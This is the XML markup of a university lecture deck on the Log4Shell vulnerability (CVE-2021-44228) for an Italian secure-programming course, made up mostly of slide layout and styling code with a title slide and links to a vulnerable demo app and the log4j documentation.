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23"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="342" r:id="rId4"/>
    <p:sldId id="344" r:id="rId5"/>
    <p:sldId id="306" r:id="rId6"/>
    <p:sldId id="346" r:id="rId7"/>
    <p:sldId id="345" r:id="rId8"/>
    <p:sldId id="308" r:id="rId9"/>
    <p:sldId id="332" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="352" r:id="rId12"/>
    <p:sldId id="351" r:id="rId13"/>
    <p:sldId id="347" r:id="rId14"/>
    <p:sldId id="353" r:id="rId15"/>
    <p:sldId id="348" r:id="rId16"/>
    <p:sldId id="354" r:id="rId17"/>
    <p:sldId id="337" r:id="rId18"/>
    <p:sldId id="340" r:id="rId19"/>
    <p:sldId id="341" r:id="rId20"/>
    <p:sldId id="310" r:id="rId21"/>
    <p:sldId id="330" r:id="rId22"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserrat" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
      <p:italic r:id="rId26"/>
      <p:boldItalic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Alternates" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId28"/>
      <p:bold r:id="rId29"/>
      <p:italic r:id="rId30"/>
      <p:boldItalic r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat ExtraBold" panose="020F0502020204030204" pitchFamily="34" charset="0"/>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96BCDF2-B9D2-4E41-AF83-7F132D57B376}">
  <a:tblStyle styleId="{A96BCDF2-B9D2-4E41-AF83-7F132D57B37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61" d="100"/>
          <a:sy n="161" d="100"/>
        </p:scale>
        <p:origin x="78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6ed1775e42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6ed1775e4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24802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6ed1775e42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6ed1775e4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91984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6ed1775e42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6ed1775e4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37786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6ed1775e42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6ed1775e4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704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6ed1775e42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6ed1775e4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43150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6ed1775e42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6ed1775e4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34738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6ed1775e42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6ed1775e4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97548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6ed1775e42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6ed1775e4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844927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6ed1775e42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6ed1775e4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33532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6ed1775e42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6ed1775e4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45106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6ed1775e42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6ed1775e4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6ed1775e42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6ed1775e4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5372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6ed1775e42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6ed1775e4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34072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6ed1775e42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6ed1775e4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84342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6ed1775e42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6ed1775e4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24882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6ed1775e42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6ed1775e4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77920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6ed1775e42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6ed1775e4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115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6ed1775e42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6ed1775e4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47460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6ed1775e42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6ed1775e4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99004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11700" y="293400"/>
            <a:ext cx="8520600" cy="537873"/>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3000"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="3000" b="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold"/>
                <a:ea typeface="Montserrat ExtraBold"/>
                <a:cs typeface="Montserrat ExtraBold"/>
                <a:sym typeface="Montserrat Extra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743050" y="2888250"/>
            <a:ext cx="36579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Font typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserra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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Google Shape;22;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="8214"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="658750" y="-1397100"/>
            <a:ext cx="7826501" cy="7437298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;23;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775144" y="1313000"/>
            <a:ext cx="3564900" cy="3255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4" name="Google Shape;24;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803956" y="1313000"/>
            <a:ext cx="3564900" cy="3255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5" name="Google Shape;25;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3972475" y="378225"/>
            <a:ext cx="4398600" cy="515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100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
              <a:defRPr sz="21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sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;34;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="0"/>
            <a:ext cx="1668900" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="dk1"/>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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7513150" y="0"/>
            <a:ext cx="1668900" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="dk1"/>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6" name="Google Shape;36;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="240625" y="3354737"/>
            <a:ext cx="8662743" cy="2601674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Google Shape;37;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="240625" y="-812913"/>
            <a:ext cx="8662743" cy="2601674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301375" y="1417650"/>
            <a:ext cx="6541200" cy="23082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pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Google Shape;40;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3192424" y="1047350"/>
            <a:ext cx="12336426" cy="4096149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;41;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4998775" y="1276500"/>
            <a:ext cx="33552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3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2" name="Google Shape;42;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4998775" y="2110500"/>
            <a:ext cx="3355200" cy="16656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1"/>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BLANK_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 149"/>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BLANK_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5434928" y="-827887"/>
            <a:ext cx="6153101" cy="6799271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2444022" y="-827887"/>
            <a:ext cx="6153101" cy="6799271"/>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2">
  <p:cSld name="BLANK_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Google Shape;154;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76672" y="-827887"/>
            <a:ext cx="6153101" cy="6799271"/>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0237D"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="011445"/>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2800"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold"/>
                <a:ea typeface="Montserrat ExtraBold"/>
                <a:cs typeface="Montserrat ExtraBold"/>
                <a:sym typeface="Montserrat ExtraBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternate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accent1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-3175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2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-3175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3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-3175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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-3175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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-3175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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-3175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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-3175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accent1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent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4" r:id="rId3"/>
    <p:sldLayoutId id="2147483655" r:id="rId4"/>
    <p:sldLayoutId id="2147483658" r:id="rId5"/>
    <p:sldLayoutId id="2147483674" r:id="rId6"/>
    <p:sldLayoutId id="2147483675" r:id="rId7"/>
    <p:sldLayoutId id="2147483676"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10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/christophetd/log4shell-vulnerable-app" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><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hyperlink" Target="https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/TTCCLayout.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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00237D"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="011445"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 162"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Google Shape;163;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-883506" y="0"/>
            <a:ext cx="4892424" cy="5406203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Google Shape;164;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5317068" y="-327231"/>
            <a:ext cx="4892424" cy="5406203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1FBB7F-AF75-440A-BD1A-37E300189891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841578" y="520175"/>
            <a:ext cx="7460841" cy="398426"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3400" b="1" dirty="0">
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Log4Shell: CVE-2021-44228</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Immagine 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510702FC-44AC-4C24-B37F-754B16D1D122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761675" y="1175358"/>
            <a:ext cx="1620649" cy="1620649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="CasellaDiTesto 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930934EC-E727-4F1A-B1CF-5690CF63A4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287857" y="2907745"/>
            <a:ext cx="4564917" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Programmazione Sicura A.A 2021-22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="CasellaDiTesto 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411D825D-4554-4B3F-B595-D370E5990C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109789" y="4226696"/>
            <a:ext cx="3855028" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Prof.ssa Barbara Masucci </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="CasellaDiTesto 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
